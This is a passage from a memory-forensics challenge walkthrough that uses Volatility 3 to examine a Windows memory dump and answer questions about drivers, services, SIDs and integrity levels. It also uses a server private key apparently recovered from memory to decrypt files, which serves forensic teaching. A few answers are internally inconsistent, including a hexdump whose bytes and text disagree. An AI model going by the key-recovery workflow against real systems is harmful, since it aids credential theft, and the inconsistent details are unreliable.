└─$ openssl pkeyutl -decrypt -inkey ssl_dump/file.0xe78bf7938510.0xe78bf6c3fb70.DataSectionObject.server.key.dat -in stolen_private_key.txt.enc > stolen_private_key.txt.dec

Here we go! We are now back to the original text.

┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat stolen_private_key.txt.dec
Welcome to Nik's Total Recall 2024 Memory Forensics Challenge


Hopefully, this helped you to understand how someone might have been able to steal a key from memory and then perform malicious actions as was done at Microsoft.

Moving on!

Looking at DLL for HTTPD process

┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ ~/volatility3/vol.py --file SECURITYNIK-WIN-20231116-235706.dmp windows.dlllist.DllList --pid 10008 > httpd_dlllist.txt
Progress:  100.00               PDB scanning finished

Q: What path is the http image file/executable loaded from?
A: Image is loaded from "c:\xampp\apache\bin\httpd.exe"
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ head httpd_dlllist.txt --lines=5
Volatility 3 Framework 2.5.2

PID     Process Base    Size    Name    Path    LoadTime        File output

10008   httpd.exe       0x7ff69ef60000  0xc000  httpd.exe       c:\xampp\apache\bin\httpd.exe   2023-11-16 23:26:15.000000      Disabled

Looking Driver List

Here is a subset:

┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat drivers_scan.txt | head --lines=10
Volatility 3 Framework 2.5.2

Offset  Start   Size    Service Key     Driver Name     Name

0xb9841ee78464  0x690064004e    0x610057        N/A     N/A     N/A
0xb9841ee78464  0x690064004e    0x610057        N/A     N/A     N/A
0xb9841ee8f31c  0x939800249370  0x249420        N/A     N/A     N/A
0xb9841ee8f31c  0x939800249370  0x249420        N/A     N/A     N/A
0xe78befeb8c20  0xf8021f400000  0x0     \Driver\ACPI_HAL        ACPI_HAL        \Driver\ACPI_HAL
0xe78befeb8e30  0xf8021f400000  0x0     \Driver\WMIxWDM WMIxWDM \Driver\WMIxWDM
.......

Q: How many unique Devices Drivers "Name" do we have listed. Including the full path and ignoring any "N/A" and non-ASCII characters?
A: 155

┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat drivers_scan.txt | awk --field-separator=' ' '{ print $6 }'| sort --unique | sed '1,2d' | head --lines=-3 | wc --lines
155

Looking at the service SIDs.

┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ ~/volatility3/vol.py --file SECURITYNIK-WIN-20231116-235706.dmp windows.getservicesids.GetServiceSIDs > service_sids.txt
Progress:  100.00               PDB scanning finished


Earlier, we saw at the beginning, we identified the tool used to perform this memory capture. This tool was installed as a service. 

Q: What is the service SIDs associated with this tool/software?
A: S-1-5-80-799667949-3218159461-2708755627-866028366-136143606    DumpIt

Q: When analyzing the PowerShell history there was a search for an executable via the "dir" command. What is the device driver used by this software for "packet capture (and sending) library"?
A: S-1-5-80-1676788727-3510623216-988961428-862518577-4183329668   npcap
S-1-5-80-3864102162-464399774-2857244265-230461771-3046054788   npcap_wifi

Q: What is/are the service ID(s) associated with the SSH we learned about earlier?
A: S-1-5-80-3847866527-469524349-687026318-516638107-1125189541    sshd

All answers can be found here:

┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat service_sids.txt | grep --perl-regexp --ignore-case 'DumpIt|npcap|ssh'
S-1-5-80-799667949-3218159461-2708755627-866028366-136143606    DumpIt
S-1-5-80-1676788727-3510623216-988961428-862518577-4183329668   npcap
S-1-5-80-3864102162-464399774-2857244265-230461771-3046054788   npcap_wifi
S-1-5-80-2277354432-2697620045-1656008878-1855416240-261295475  ssh-agent
S-1-5-80-3847866527-469524349-687026318-516638107-1125189541    sshd

Q: What is path of the file associated with these drivers

Aggregate all the modules.

┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ ~/volatility3/vol.py --file SECURITYNIK-WIN-20231116-235706.dmp windows.modscan.ModScan > modscan.txt
Progress:  100.00               PDB scanning finished

A: Nothing returned for ssh. However, we have the other two returned their paths

┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ grep --perl-regexp --ignore-case 'DumpIt|npcap|ssh' modscan.txt
0xe78bf0831710  0xf802266b0000  0x13000 npcap.sys       \SystemRoot\system32\DRIVERS\npcap.sys  Disabled
0xe78bf49f58e0  0xf802469f0000  0x14000 DumpIt.sys      \??\C:\Windows\system32\Drivers\DumpIt.sys      Disabled


Alternatively, we could have gotten this information from:

┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ grep --perl-regexp --ignore-case 'DumpIt|npcap|ssh' modules.txt
0xe78bf0831710  0xf802266b0000  0x13000 npcap.sys       \SystemRoot\system32\DRIVERS\npcap.sys  Disabled
0xe78bf49f58e0  0xf802469f0000  0x14000 DumpIt.sys      \??\C:\Windows\system32\Drivers\DumpIt.sys      Disabled


Still with the tool used to get this memory capture.

Q: Where was the memory capturing tool launched from?
A: "\TOOLS\DumpIt.exe"

┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ ~/volatility3/vol.py  --file SECURITYNIK-WIN-20231116-235706.dmp windows.ldrmodules.LdrModules --pid 5652
Volatility 3 Framework 2.5.2
Progress:  100.00               PDB scanning finished
Pid     Process Base    InLoad  InInit  InMem   MappedPath
...
5652    DumpIt.exe      0x7ff7da2c0000  True    False   True    \TOOLS\DumpIt.exe

Alternatively, we could have used.
Q: How many modules were loaded/used by this tool to when loading?
A: There are 39 files in total used by Dumpit

Write the information out to a file: 
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ ~/volatility3/vol.py  --file SECURITYNIK-WIN-20231116-235706.dmp windows.ldrmodules.LdrModules --pid 5652 > 5652_dumpit.txt
Progress:  100.00               PDB scanning finished

┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat 5652_dumpit.txt | sed '1,4d' | wc --lines
39

Revisiting persistence. Looking at the services on the system.

┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ ~/volatility3/vol.py --file SECURITYNIK-WIN-20231116-235706.dmp windows.svcscan > svcscan.txt
Progress:  100.00               PDB scanning finished

Q: How many services were on this system at the time of the capture?
A: There are 825 services on the system:

┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$cat svcscan.txt | sed '1,4d' | wc --lines
825

Q: What are their different service states and their counts?
A: Below shows the two states and their counts.
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$cat svcscan.txt | awk --field-separator=' ' '{ print $5 }' | sort | uniq --count | sort | tail --lines=2
    361 SERVICE_RUNNING
    464 SERVICE_STOPPED

Q: What are the different service "start" modes and their counts?
A: 
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat svcscan.txt | awk --field-separator=' ' '{ print $4 }' | sort | uniq --count | sort --numeric-sort --reverse
    566 SERVICE_DEMAND_START
    165 SERVICE_AUTO_START
     47 SERVICE_BOOT_START
     32 SERVICE_SYSTEM_START
     15 SERVICE_DISABLED

Q: What is/are the current state(s) of the service(s) on the system and their counts?
A: 
Different Service "Type"
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat svcscan.txt | awk --field-separator=' ' '{ print $6 }' | sort | uniq --count | sort --numeric-sort --reverse
    352 SERVICE_KERNEL_DRIVER
    180 SERVICE_WIN32_SHARE_PROCESS
    150 SERVICE_WIN32_OWN_PROCESS|SERVICE_WIN32_SHARE_PROCESS
    100 SERVICE_WIN32_OWN_PROCESS
     40 SERVICE_FILE_SYSTEM_DRIVER
      3
      2 SERVICE_WIN32_OWN_PROCESS|SERVICE_INTERACTIVE_PROCESS
      1 Type
      1 SERVICE_WIN32_SHARE_PROCESS|SERVICE_INTERACTIVE_PROCESS

Previously, you needed to find the driver associated with "capturing and (sending) packets".
Q: How is this driver configured to start, what was its state at the time of capture, what type of driver is it and what memory offset can it be found at?

A: Answer is here for all.
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat svcscan.txt | grep npcap
0x2152b86a460   328     N/A     SERVICE_SYSTEM_START    SERVICE_RUNNING SERVICE_KERNEL_DRIVER   npcap   Npcap Packet Driver (NPCAP)

Similarly to the previous question, we saw the system was listening on port 22 at the time of capture. 
Q: What was the servicename, state, start, type and name for the service listening on this port.

┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ grep --ignore-case 'sshd' svcscan.txt
0x2152b887240   462     0       SERVICE_AUTO_START      SERVICE_RUNNING SERVICE_WIN32_OWN_PROCESS       sshd    OpenSSH SSH Server      -
0x2152b8888f0   462     0       SERVICE_AUTO_START      SERVICE_RUNNING SERVICE_WIN32_OWN_PROCESS       sshd    OpenSSH SSH Server

We started looking at ncat.exe earlier in this process and spent a reasonable amount of time on it, so let's go back to looking at permissions.

Q: What "integrity level" is the ncat.exe process running at?
A: Medium Mandatory Level

Q: Is the user who was logged on at the time this capture was taken part of the "Domain Users" group?
A: Yes.

Q: Is the user who was logged on at the time this capture was taken part of the "Domain Admins" or "Enterprise Admin" group?
A: No

Q: Is the user who was logged on at the time this capture was taken part of the local "Administrators" group?
A: Yes.
896     ncat.exe        S-1-5-114       Local Account (Member of Administrators)
896     ncat.exe        S-1-5-32-544    Administrators

Q: What type of authentication mechanism is the user of this process using? eg. LM, NTLM, Kerberos, Digest, SChannel?
A: NTLM Authentication
896     ncat.exe        S-1-5-64-10     NTLM Authentication

Below answers all the questions.
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ ~/volatility3/vol.py --file SECURITYNIK-WIN-20231116-235706.dmp windows.getsids --pid 896
Volatility 3 Framework 2.5.2
Progress:  100.00               PDB scanning finished
PID     Process SID     Name

896     ncat.exe        S-1-5-21-1563833629-3224366856-3602044515-1001  securitynik
896     ncat.exe        S-1-5-21-1563833629-3224366856-3602044515-513   Domain Users
896     ncat.exe        S-1-1-0 Everyone
896     ncat.exe        S-1-5-114       Local Account (Member of Administrators)
896     ncat.exe        S-1-5-32-544    Administrators
896     ncat.exe        S-1-5-32-545    Users
896     ncat.exe        S-1-5-4 Interactive
896     ncat.exe        S-1-2-1 Console Logon (Users who are logged onto the physical console)
896     ncat.exe        S-1-5-11        Authenticated Users
896     ncat.exe        S-1-5-15        This Organization
896     ncat.exe        S-1-5-113       Local Account
896     ncat.exe        S-1-5-5-0-1032752       Logon Session
896     ncat.exe        S-1-2-0 Local (Users with the ability to log in locally)
896     ncat.exe        S-1-5-64-10     NTLM Authentication
896     ncat.exe        S-1-16-8192     Medium Mandatory Level

Earlier we saw there is a PowerShell History log. 

Also, here is the evidence from the process list that PowerShell was running at the time this capture was taken.
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat pslist.txt | grep powershell
2992    1548    powershell.exe  0xe78bf3d6e0c0  0       -       0       False   2023-11-16 19:18:05.000000      2023-11-16 19:18:06.000000      Disabled
2252    2992    powershell.exe  0xe78bf435f0c0  0       -       0       False   2023-11-16 19:18:06.000000      2023-11-16 22:01:47.000000      Disabled
4728    2460    powershell.exe  0xe78bf4f900c0  10      -       1       False   2023-11-16 20:05:01.000000      N/A     Disabled
644     2460    powershell.exe  0xe78bf5287080  9       -       1       False   2023-11-16 21:16:12.000000      N/A     Disabled
4852    2460    powershell.exe  0xe78bf46770c0  9       -       1       False   2023-11-16 21:42:18.000000      N/A     Disabled
4120    5508    powershell.exe  0xe78bf6961080  0       -       0       False   2023-11-16 22:08:06.000000      2023-11-16 22:08:31.000000      Disabled

Q: What "Integrity Level" is being used by this/these "powershell.exe"?
A: There are three powershell.exe at PIDs 2992,2252 and 4120 which are running at System Level privileges. 

Q: What is/are the PID of the powershell.exe(s) with the highest "Integrity Level"?
A: 2992, 4120

Q: What is the "Integrity Level SID" for this "Integrity Level"?
A: S-1-16-16384

Q: What other "Integrity Levels" have we seen powershell.exe running with?
A: High Mandatory Level


┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ ~/volatility3/vol.py --file SECURITYNIK-WIN-20231116-235706.dmp windows.getsids --pid 2992 2252 4728 644 4852 4120 | grep --ignore-case Mandatory
2992   powershell.exe  S-1-16-16384   System Mandatory Level
2252    powershell.exe  S-1-16-16384    System Mandatory Level
4728    powershell.exe  S-1-16-12288    High Mandatory Level
644     powershell.exe  S-1-16-12288    High Mandatory Level
4852    powershell.exe  S-1-16-12288    High Mandatory Level
4120    powershell.exe  S-1-16-16384    System Mandatory Level

Well that's its for this challenge!

With the understanding above, and if you completed the tasks above, these bonus questions should be relatively easy.

Bonus question 1: Decrypt the file "encrypted_w_priv_key.enc" to find the phrase that pays.

Here is how I encrypted the file using the private key, which means you need to use the public key to decrypt.

┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ echo 'PHRASE THAT PAYS:**public_key_decrypted**' | openssl pkeyutl -inkey ssl_dump/file.0xe78bf7938510.0xe78bf6c3fb70.DataSectionObject.server.key.dat -sign -out encrypted_w_priv_key.enc


As always, I can verify the file's content is encrypted.

┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ hexdump --canonical encrypted_w_priv_key.enc
00000000  60 8a d3 84 6f 04 b3 4e  50 58 8a cd 59 88 1b e1  |`...o..NPX..Y...|
00000010  78 fb 5c 85 25 9a c9 4e  da ad 64 ee 51 a1 3d 4b  |x.\.%..N..d.Q.=K|
00000020  61 aa 44 4f a8 f9 92 9c  7d b6 5d 7b db c4 c1 83  |a.DO....}.]{....|
00000030  69 e5 6d 4a 79 b3 12 e8  fe fb bf 09 2a 5e 6f f6  |i.mJy.......*^o.|
00000040  37 52 01 84 df c6 01 31  ec d0 61 d0 a2 6f e7 46  |7R.....1..a..o.F|
00000050  ad 7a e6 b8 8d 89 31 1c  fa 0c 65 35 65 74 21 d2  |.z....1...e5et!.|
00000060  77 d0 96 87 da e5 1b 3a  1f cf ae 40 27 cd 3f 31  |w......:...@'.?1|
00000070  f1 c2 3a 64 a7 9f 9a 98  59 f8 43 cf 09 75 19 88  |..:d....Y.C..u..|
00000080

Because we used the private key to encrypt, we need the public key to decrypt.

┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ openssl rsautl -inkey mem_server_pub.pem -pubin -in encrypted_w_priv_key.enc -hexdump -verify
The command rsautl was deprecated in version 3.0. Use 'pkeyutl' instead.
0000 - 50 48 52 41 53 45 20 54-48 41 54 20 50 41 59 53   PHRASE THAT PAYS
0010 - 3a 2a 2a 70 75 62 6c 69-63 5f 6b 65 79 5f 64 65   :**public_key_de
0020 - 63 72 79 70 74 65 64 2a-2a 0a                     crypted**.


Voila! There we go, we have decrypted the contents. I could have redirected it out to a file instead if needed such as.

┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ openssl rsautl -inkey mem_server_pub.pem -pubin -in encrypted_w_priv_key.enc -verify --out decrypted.txt
The command rsautl was deprecated in version 3.0. Use 'pkeyutl' instead.

┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat decrypted.txt
PHRASE THAT PAYS:**public_key_decrypted**

Ok! Caveat here for those that are paying attention!! I did not actually "encrypt" the data above, as I did not use the "-encrypt" option but instead "-sign". Signing and encrypting are two different things. 

With signing, the data is signed by using a hashing algorithm and the sender's private key. When we think hashing, we are thinking about a digest. This value will be fixed. Which means, every time I run the command "echo 'PHRASE THAT PAYS:**public_key_decrypted**' | openssl pkeyutl -inkey ssl_dump/file.0xe78bf7938510.0xe78bf6c3fb70.DataSectionObject.server.key.dat -sign" the output will always be the same. 

This is different from if I had done "echo 'PHRASE THAT PAYS:**public_key_decrypted**' | openssl pkeyutl -inkey ssl_dump/file.0xe78bf7938510.0xe78bf6c3fb70.DataSectionObject.server.key.dat -encrypt". This result in a different output every time, because of the random nature of encryption. Go ahead and test it for yourself.


While I cheated above, here is the actual encrypting and decrypting.

Bonus question 2: Decrypt the file "encrypted_w_pub_key.enc" to find the phrase that pays.
Here is how I encrypted the file using the public key, which means you need to use the private key to decrypt.

┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ echo -e 'PHRASE THAT PAYS:**private_key_decrypted**' | openssl pkeyutl -encrypt -inkey mem_server_pub.pem -pubin -out encrypted_w_pub_key.enc

While I created the contents on one line and encrypted it, we can still run xxd or hexdump or another hex editor on the file, to confirm its content is encrypted.

┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ hexdump --canonical encrypted_w_pub_key.enc
00000000  4f 3a 60 1b 9d 67 78 44  51 34 8e dd 8e a7 c6 04  |O:`..gxDQ4......|
00000010  13 5f e1 77 1f c1 b5 a4  30 f9 47 82 ad 0b 54 27  |._.w....0.G...T'|
00000020  dc 4b 74 7d 08 ea 6b 5b  db 73 ad a6 a7 08 ea 14  |.Kt}..k[.s......|
00000030  72 d7 2e a0 7e 43 1a 6d  94 5a 03 83 ea 1c 01 9c  |r...~C.m.Z......|
00000040  1d 67 84 7b 89 86 db 6b  ea 78 c4 41 1d a1 ce 7c  |.g.{...k.x.A...||
00000050  2f 91 15 ff b0 08 6c c8  bd 9b fe 88 c8 a9 f8 e6  |/.....l.........|
00000060  b3 ca 38 63 71 f8 61 7f  78 52 8a 96 be c6 f8 ac  |..8cq.a.xR......|
00000070  a6 5b 8f 22 b9 59 3d cc  02 bf c8 ed f2 b9 aa ea  |.[.".Y=.........|
00000080

With this confirmation, similarly to what we did above earlier, if we use the public key to encrypt, we then need the private key to decrypt. Let's do just that.

┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ openssl pkeyutl -decrypt -inkey ssl_dump/file.0xe78bf7938510.0xe78bf6c3fb70.DataSectionObject.server.key.dat -in encrypted_w_pub_key.enc | hexdump --canonical
00000000  50 48 52 41 53 45 20 54  48 41 54 20 50 41 59 53  |PHRASE THAT PAYS|
00000010  3a 2a 2a 70 72 69 76 61  74 65 5f 64 65 79 5f 64  |:**private_key_d|
00000020  65 63 72 79 70 74 65 64  2a 2a 0a                 |ecrypted**.|
0000002b


Voila! We have the phrase that pays, recovered in plain text.

Hope you enjoyed this memory forensics challenge.

References: